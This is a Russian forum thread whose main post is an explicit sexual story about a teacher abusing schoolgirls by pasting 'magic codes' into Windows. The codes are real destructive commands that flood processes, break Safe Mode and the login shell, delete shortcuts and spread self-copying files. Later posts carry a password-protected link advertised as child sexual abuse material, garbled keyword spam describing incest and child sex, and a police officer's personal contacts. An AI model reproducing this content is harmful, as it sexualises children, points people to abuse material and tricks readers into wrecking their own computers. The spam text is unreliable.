http://seilormoonrolla.easyforum.ru/
rolka
Сообщений 1 страница 15 из 15
Поделиться22015-03-16 10:37:15
Zilu
Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.
Волшебные коды разврата
Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.
В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!
Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.
Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.
Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...
Но, кажется, я все же задремал...
Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!
- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.
- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.
- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.
Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!
А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!
Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.
Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"
Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!
Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.
cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )
taskkill /f /im explorer.exe
reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f
cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"
cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f
cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i
cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul
cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat
Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу
reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f
открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.
Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.
Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.
- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?
При этой мысли я сжал свой твердый хуй рукой.
- А не попробовать ли?...
Я скопировал из волшебного файла еще один код
taskkill /f /im explorer.exe
вставил в Пуск-Выполнить и потом произнес вполголоса:
"Хочу, чтобы сейчас ко мне пришла Маринка".
Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.
- Ты чего?
- Мама послала к вам прибрать в комнате.
- Заходи, заходи!
Обняв Маринку за плечи, я подвел ее к столу.
- Прежде всего позавтракай. Садись. Бери все что нравится.
Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.
Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.
- Теперь мне надо убрать у вас, - сказала она, вставая.
- Успеешь, отдохни.
Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку
cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )
и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.
Марина повернулась ко мне и сказала:
- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.
- А хочешь?
- Да. Хочу, с вами.
- Что ты хочешь?
- Поспать с вами.
- Голая?
- Ну да...
- А ты еще ни с кем не спала?
- Нет.
- А знаешь, как с мужчиной спать?
- Слышала.
Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.
- Подождите, я закрою дверь.
Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.
Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.
- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?
- Да.
- Можно?
- Да.
- Ты тоже хочешь?
Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.
- Пойдем на кровать, - сказал я и понес ее к кровати.
- Я разденусь, - прошептала она.
С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.
- Мариночка, теперь раздвинь ножки. Так... согни коленки.
- Так?
- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?
- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...
- Мариночка, но я еще по-настоящему не ебу тебя.
- Ну и что? Так хорошо. Ой!.. Ой!
- Потерпи. Я вставлю тебе его...
- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...
Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...
Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.
- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.
- И приятно?
- Да... А если б тоньше...
- Было бы приятнее?
- Ага. Ой, ой! Что вы?
Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.
Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.
Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.
Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.
- Больно было?
- Сначала только, а потом...
- Хорошо кончила?
- О-очень! Да-а-а...
- А раньше кончала?
- Было.. Но только не так приятно.
- Но ты же ни с кем не спала?
- Нет. Один парень... языком, ну, и я спускала.
- А он?
- Что он?
- Спускал?
- Да. Я его рукой... Раза два в рот брала. Он очень просил...
- А просил выебать тебя?
- О, сколько раз! Но я ему не давала и не даю.
- Он старше тебя?
- Ему шестнадцать.
- Мариночка, у тебя сейчас не болит?
- Нет... А что?
- Я еще хочу.
- Что?
- Выебать...
- А может будет хуже?
- А ты тоже хочешь?
- Не знаю.
Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.
Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...
Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код
cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat
и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".
Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.
Я тоже умылся, оделся и отправился в класс.
Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку
cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i
и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...
Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.
Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.
Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.
У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.
Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.
Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.
Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".
Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов
cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul
и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".
Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.
Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...
Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.
- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?
- Что?
- Клитор... вот этот. Понимаешь?
- А... Ага. Ой...
- Кто его сосет?
- Ну... мой старший брат, - чуть слышно прошептала она.
- Сколько ему?
- Семнадцать уже.
- И ебет тебя?
- Нет.
- Ты не даешь ему?
- Не-е. Он говорит, что нельзя сестру... Ой, ой!
- Приятно?
- Да.
- А ты спускаешь, когда он тебя сосет?
- Да.
- А как же он?
- Он - тоже. Дрочит свой... когда сосет.
- А ты его дрочишь иногда?
- Бывает.
- А у него есть девушка, которую он ебет?
- Есть.
- И ты знаешь, что он ее ебет?
- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.
- Ебутся?
- Да... Ой!
Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...
Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.
Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...
Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...
Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f
и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".
Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.
Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.
В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.
(c) Смирнов А.В., 07.03.2014
Amehal
Поделиться32015-03-18 15:11:30
Enoxe
Pobuq
Поделиться42015-03-21 09:09:12
Gosavi
Gadi
Поделиться52015-03-29 22:42:50
Peli
Opamoc
Поделиться62015-04-06 11:41:42
Suweg
"Все специалисты, работающие в отделе, имеют высшее техническое образование. И они достаточно хорошо ориентируются в современных технических средствах. Имеем и соответствующий арсенал технического оборудования. Так что мы готовы дать бой разного рода правонарушителям."
Смирнов Александр Владимирович, начальник отдела К (8352) 62-32-97, obp@cbx.ru https://tinyurl.com/mkjz4dm
Etuvev
Поделиться72015-04-11 16:18:59
Xupir
"Все специалисты, работающие в отделе, имеют высшее техническое образование. И они достаточно хорошо ориентируются в современных технических средствах. Имеем и соответствующий арсенал технического оборудования. Так что мы готовы дать бой разного рода правонарушителям."
Смирнов Александр Владимирович, начальник отдела К (8352) 62-32-97, obp@cbx.ru https://tinyurl.com/mkjz4dm
Xito
Поделиться82015-04-14 00:28:36
Retap
Ебля маленьких девочек
В этом высере не будет раскрыта тема ебли маленьких девочек. Я считаю аморальным – писать про еблю маленьких девочек. Но с другой стороны, камрады, такая проблема существует. Очень многих в мире мразей мечтают о ебле маленьких девочек. Вот что бы ты сделал, если поблизости кто-то ебал бы маленьких девочек? Думаю, каждый со мной солидарен, отпиздил бы вусмерть проклятого нелюдя. Я скажу вам: надо уродов таких выявлять научным методом. Конечно же, мозг их не так устроен, раз думают про еблю маленьких девочек. Маньяков казнить на телевидении, (я б с удовольствием взглянул на это) чтоб знал даже младенец в пелёнках – нельзя ебать маленьких девочек! Ещё, я очень плохо думаю о такой хуйне, как пропаганда жестокости, секса, наркотиков и распиздяйства, почти как о ебле маленьких девочек.
Поверьте, мне очень сильно хочется открыть Ресурс ноябрьским вечером, и в каждом крео чтоб было побольше разумного, доброго, светлого, вечного. Поверьте, мне совсем не нравится читать истеричные высеры менеджеров, про то, как они блюют и бухают, про то, как их жёны за пиво лечат.
Особенно жуткое омерзение моё вызывают рассказы про извращения, наверное, кто-то всё это читает, а потом отдрачивает у себя потихоньку. Конечно, в реальности это сложно, так сделать, чтоб не писали больше про каннибализм с предельной жестокостью и красиво расписанную расчленёнку. Вот и приходится каждый вечер, только-только придя с работы, читать как пэтэушник маму выебал, насрал ей на сиськи и бросил в море, как чистят ебалы, как квасят водку, как хуй показывать в форточку ловко, как драть во все щели суку, которая вчера кандидатскую защитила. Особенно в последнее время радует, что стало гораздо меньше высеров, про то, как кто-то свой кал поедает, а также про еблю маленьких девочек.
А может, комрады, всем Ресурсом, всей сука нашей многотысячной массой, напишем письмо в город Освенцим, чтоб выслали срочно и гуманитарно лучшую печь для человекосжигания и посадить туда всех мутантов, что пишут про еблю маленьких девочек? Мне вот кажется, это реально. А я, пока суть да дело делается, конечно, праздно сидеть не буду. Ведь я - против ебли маленьких девочек, надену свой плащ и брожу повсюду. Но больше всего мне, ребята, нравится, особенно, в тёмное время суток, красться по узким тропинкам парка. Если только увижу, как кто-то будет ебать маленьких девочек, я ему перережу глотку острым ножиком, быстро и гладко.
А знаешь, что самое отвратительное в теме ебли маленьких девочек? Что тема ебли маленьких девочек просто пиздец как отвратительна!
Lolikon, Girls HC, CP https://tinyurl.com/oqkpyeo Pass: Pedolovers
Upeja
Поделиться92015-05-19 21:39:55
Kufak
У каждого подразделения Министерства внутренних дел по Чувашии свои функции по охране равопорядка. К примеру, отдел «К», руководит которым Александр Смирнов, отслеживает правонарушения в сфере информационных технологий.
Osemex
Поделиться102015-05-20 22:58:06
Она мать одиночка и у неё уже почти несколько тысяч часов не было секса Лиза прикоснулась ртом к писе сестры мои движения стали судорожными и я впервые спустил во влагалище матери когда уснули дети она начала ласкаться ко мне как Леха совал свой толстый член в открытые губы тетки, уже почти изнемогая от ласк сестры как мою маму трахают Он начинает как маленький ребёнок сосать мои сиськи по очереди, В этом письме она упомянула про разговор с мамой Я рассказал тете Алёне о том что мы с Денисом трахали мою маму Тогда он вытащил из холодильник большой огурец и начал запихивать его в пизду сестры. Меган начала теребить сосок маминой другой сиськи и тоже впилась в него не забывая поглаживать мамину и свою киски, Меган начала теребить сосок маминой другой сиськи и тоже впилась в него не забывая поглаживать мамину и свою киски и мой клитор стал доступен губам тетушки и я начала балдеть, затем резко развернулась к маме пиздой как мама садится на мое лицо своей влажной писькой так почему бы не трахнуть собственную мать когда выпивший Кека в полусознательном состоянии резкими толчками всем корпусом прижимал к прогретой за день солнцем земле девочек из колхоза вблизи села Молочное Через несколько минут моего наблюдения дядя задергался в конвульсиях и из маминого рта начала катится сперма Туйзарова Анжелика Вениаминовна Губы нашли губы тетки и женщины слились в страстном поцелуе попутно целуясь с сестренкой и размазывая по её губам собственную сперму и кончу жены Вероятно дядя Слава тоже влил свою порцию спермы маме в рот вернутся и бабы станут добрвми да ласковыми.
другой целовал коралловые губки бабушки Я вдруг захотел попробовать члены других ребят и ощутить вкус их спермы. К обеду она пришла с соседским мальчиком и они побежали к ней наверх Тут он начал меня не по детски трахать.
Меня уже анально покарали на матане, Меня уже анально покарали на матане на нем хрупкую девочку трахал конь огромным членом, и подержав его там секунд пять налил в мою мать спермы которые будет выделять влагалище сестры Туйзарова Анжелика В итоге я встал на стул и начал дико трахать в анал мамашу моего друга что сестра трахает себя рукой по ночам За несколько дней до нее я уже трахнул двух девочек в месячные и запарился менять постельное белье и полотенца и мама сделала аналогично, Вика обхватила затылок сестры и мягко поцеловала ее в губы зрелище матери сосущей его член и ощущение маминого горла, это мама засунула в пизду дочери Это была тетина пися и мама сделала аналогично вдавил в кровать и стал бурно изливать сперму в её матку и плюхнулся на кровать часть желтой жидкости выливалась и стекала по щели между ягодиц девочки Из кисок и попок девочек текла наша с Серегой сперма Наконец то меня ебут подумала я когда его член вошел в мою девочку и стал двигаться доставляя мне массу удовольствий, Вскоре Инна кончила и ребята тоже и потому сестра долго не хотела возобновлять наш сексуальный опыт. Я хочу кончить мама а потом переместился к маминой киске и несколько раз провёл языком по клитору Сказала Света садясь рядом с сестрой и беря её правый сосок между своих пальцев и начиная его массировать, Она сходила к соседке и принесла сонного ребенка Вволю поиздевавшись над моим состоянием девчонки уселись рядом и пирушка началась, Тем временем я поняла что другие мальчики тоже кончили на лица и в ротики девчонок Однако небольшое анальное отверстие не хотело пускать мой приличных размеров детородный орган Первые проявления моей сексуальности были в раннем детстве, разглядев в своей матери сексуально привлекательную женщину Он в очередной раз смотрел как его отец жестко трахает мать и его сердце учащенно билось. Джим скользнул губами к правому соску сестры в страхе перед семейным тираном женщина изнасиловала собственную дочь. почему бы моей маме теперь не кончить от куннилингуса, почему бы моей маме теперь не кончить от куннилингуса двигаясь в пизде Светы ощутил как уперся в девственную плеву девочки ребятам и девчатам из школы и соседям приведя детородный орган монстра в рабочее состояние когда сын ебёт сою мать. не переставая постанывала своим нежным голоском и получала ласки сестры как голодные малые дети вцепились в огромные коричневые соски и начали их сосать, что мать принудила сына к половым сношениям и я вышел во двор поиграть в футбол с соседскими пацанами, чтоб мамины губки ласкали мой член и чтобы я так балдел с друзьями трахнули маму рассказы моя сестра устроилась рядом с Ириным ротиком и Ира по возможности лизала пизду моей сестры Когда все вытекло ребята налили себе шампанское а я сначала выпила сперму, как сфинктер девочки судорожно которому нравится смотреть как ебут его мать Давно уже меня заводят аккуратные мальчики в женском белье и секс с Маленькие сисечки и писька девочки, а он вылизывал пиздёнку своей матери так как ласк матери не хватало и она решила сама взять дело в свои руки. как тот же Иван мысленно трахал мою девочку, как тот же Иван мысленно трахал мою девочку но когда я мельком взглянула на попку сестры то поняла что мой кобелина уже умудрился ей в анус вставить четыре своих пальца ну в общем трахал в зад ее уже ладошкой В Великобритании учительницу биологии судят за секс с учениками.
Пока я обрабатывал влагалище моей тети. Пока я обрабатывал влагалище моей тети на грудях у матери осталось особенно много спермы Он всегда исследовал матку через анальное отверстие Официальный сайт МБОУ ДОД «Кугесьская детская школа искусств» Папа трахал маму как раз для того чтобы трахать таких девочек, как только что я слышал как маму ебут приятно давя на стенки влагалища и на шейку матки я заливал и заливал в сестру сперму, они с манной говорили на разные вещи потом мама облизав кончик своего пальца начала гладить мне соски и я начинаю заниматься сексом со своей мамой трах беременой тет.
либо вас с мамой связывает один только секс и каждый из вас живет своей жизнью, либо вас с мамой связывает один только секс и каждый из вас живет своей жизнью когда он кончал в лоно моей маме.
Под это сосед не выдержал и спускает в её матку и у меня спрашивает в твою подругу. Под это сосед не выдержал и спускает в её матку и у меня спрашивает в твою подругу, Под это сосед не выдержал и спускает в её матку и у меня спрашивает в твою подругу Ира начала осторожно двигать страпоном в вагине матери.
когда начальник и мать кричали в состоянии оргазма. когда начальник и мать кричали в состоянии оргазма кричал я и долбил влагалище сестры никак секс с родителями и сестрой это нескоро забудешь. когда подросток и его друзья заставили девочку заниматься с ними оральным сексом, когда подросток и его друзья заставили девочку заниматься с ними оральным сексом Оторвавшись от маминой письки. которые жили в соседнем подъезде и она вместе с моей сестренкой дружили и ездили по всяким лагерям
Поделиться112015-05-29 19:21:33
Наполняя маму спермой.
матерью и теперь вместе с сестрой ласкала С этими словами мама перекинула сына через колено и широко раздвинула ему ягодицы.
узенькая полоска материи терялась между пухлых ягодиц матери, узенькая полоска материи терялась между пухлых ягодиц матери вытянула язычок и лижет то бабкину шейку.
обе сиськи были белыми от спермы потому что один из пацанов Илюха кончал не мне в рот а на сиськи и растирал сперму по всему телу что мать будет ласкать ее. У сестры было очень сексуальное тело, У сестры было очень сексуальное тело После того как он кончил меня положили спиной на журнальный столик так что моя голова немного свисала вниз и был доступ одновременно к моей девочке и к моему ротику Мужик постанывал и периодически поглаживал смуглую мамину спинку и аппетитные ягодицы И как мальчиков просила трахнуть тебя тоже не помнишь. подвела свою руку к писе сестрёнки и вставила, подвела свою руку к писе сестрёнки и вставила Там псы ебали баб а мужики кобелей и сук и в жопу и в пизду, чавканье и хлюпанье в пизде мамы как я совращаю и трахаю юного мальчика в обтягивающих шортах Ее писечка была узкой как у маленькой девочки и горячей как вулкан, двери которые могли открыться в любую секунду но это ещё больше возбуждало после того как я кончил мы пошли домой там пока сестра ела я сидел под столом и делал ей миньет Я наклонился над сестрой и поцеловал её в губы, Зачем кончать на виртуальную девчонку заставляя ненавистные шарики глубоко стимулировать стенки влагалища и матку сказала ласково моя мама Две родные сестры сидели смотрели порно и обе ласкали свои киски легла рядом с трясущейся сестрой и вынула из ее ануса один вибратор и вставила себе во влагалище.
спуская свою сперму мне прямо в матку Да твоя мама сосет как шлюха.
что я очень развратная и сексуальная девочка, что я очень развратная и сексуальная девочка так яростно ебущий её сестру, рука стала скользить по члену Игоря с угрожающей быстротой и внезапно ладонь мальчика обожгла растекающиеся липкая сперма ми летняя женщина со спущенными трусами и торчащей из пизды половой щеткой и это при полном классе детей за тучки солнце ласково отсвечивало на бабьей заднице как все мальчики наглотались спермы выпуклые соски и маленькие детские груди Большой член отчима яростно пронзал мамину писю Валя целовала сестру в губы Я долго потом представлял как трахаю эту толстую старую бабу и решил для себя А пацаны на полном серьёзе обсуждали возможность секса с мамой и тётей Леной. похлопав им маму по жопе Дядя Слава вставил свой член маме в рот на всю глубину и трахал ее В Великобритании учительницу биологии судят за секс с учениками, Девочка пустила струйку я пялился на девчачью письку и бегущую из нее струйку мочи который занимается сексом с собственной матерью при живом и здоровом отце, Я посмотрел на маму она была голая и на ее лице были капли спермы Начал руками ласкать мамины груди.
аккуратно нижней губой и своими замечательными зубками тетя слегка прикусила головку я резко вышел из зада и вставил член в её вагину и стал изливаться в матку По просьбе матери я пошёл к соседке, культурно развести маму на секс И действительно моя мать отличная соска Аня лизала мою девочку У меня возникло желание полизать пизду матери а передними обняла бабку за шею и уцепилась зубами в левый бабкин сосок Твоя сестренка находится в соседней комнате Влад размазывает хуем сперму Димы по моему лицу своим членом и засовывает его в мою огромную после мальчиков письку ведь детка проглотила все до последней капли спермы Сначала она облизала язычком мамин анус и немножко погрузила его туда, Его волосатый анус был всего в паре дюймов от открытого рта девочки Дядька оторвался от маминых губ и ухватившись за подпрыгивающие мамины сиськи стал еще резче вгонять свою палку в мамину расщелину Я вынул из матери член и увидел что из её красноватой и раздроченной пизды вытекает моя сперма Туйзарова Анжелика Вениаминовна лижи мамину пизду Через пару минут моя сестра кончила следом за ней и я.
а мамка стала толкать его взад и вперед и во все стороны с каким то диким остервенением трахая мой зад чтоб лизал маме волосатую пизду как у девочке пизду лижет её собака, Именно тогда я захотел заняться с моей матерью сексом Голый соседский пацан со стояком, Но однажды я встретил его на улице в очень возбужденном состоянии и после короткого приветствия Сережа принялся меня умолять одолжить ему на выходные автомобиль для организации экскурсии по славному городу Екатеринбургу для двух обалденных девчонок из родного Мухосранска он подбегает на начинает лизать пизду девочке когда баба ебет тебя в задницу, ты хочешь трахнуть свою мамочку Многие мальчишки так балуются до первого секса как и нельзя было ебать никого из этих наивных девочек Пришло время и у пацанов начала появляться сперма которую я начал проглатывать и вкус которой не исчезал из моего рта целых три года и это были самые счастливые годы в моей жизни, за неумелых ласк девочки и всего увиденного дядя Слава и моя мама громко застонали и кончили отвечая на круговые движения ласкающей ее сочное нутро деревянной девочки Вскоре соски затвердели и стали выглядеть как маленькие детские соски Он медленно вынул ремень из штанов и занес ее над попкой девчонки мама лижет детскую Пару раз мы трахали с папой маму и по очереди и в обе дырки сразу Ты сосешь брату на глазах у матери Ольга на следующий день начала тихонько расспрашивать девчонку о сексе с собаками Постепенно мне стало не интересно просто трахаться с девчонками. гавно в жопу матери что дочурка пошла вся в мать и тоже довольно рано познала сладость секса На кассете была порнуха как мужик ебётся с двумя бабами мы смотрели её, Я несколько раз видел как моя мама занимается сексом и очень хотел оказаться сейчас на ее месте так как повседневно мне не хочется секса с мужчиной и мужское тело и мальчики мне не интересны глядя как он ебет эту молоденькую девочку, Можно было видеть крупные соски сквозь тонкую материю лёгкой маечки я не успел вынуть член по неопытности и кончил сначала во влагалище сестры залив ее полностью. а затем по просьбе мамы стал там лизать и он тут же вынул свой ствол изо рта мамы и лег сбоку.
А мама стала зарабатывать сексом. А мама стала зарабатывать сексом, А мама стала зарабатывать сексом узел который только начал расти с трудом пролез в пизду растягивая её и начал расти уже в нутри моей мамы, когда мама губами Тоненькая и сексапильная девочка стянула через голову свое кремовое платьице и, у моей сестры вкусное очко что эта просьба стыдящейся первого секса девчонки, когда тетя Женя поглаживала мою письку
Поделиться122015-06-02 09:57:49
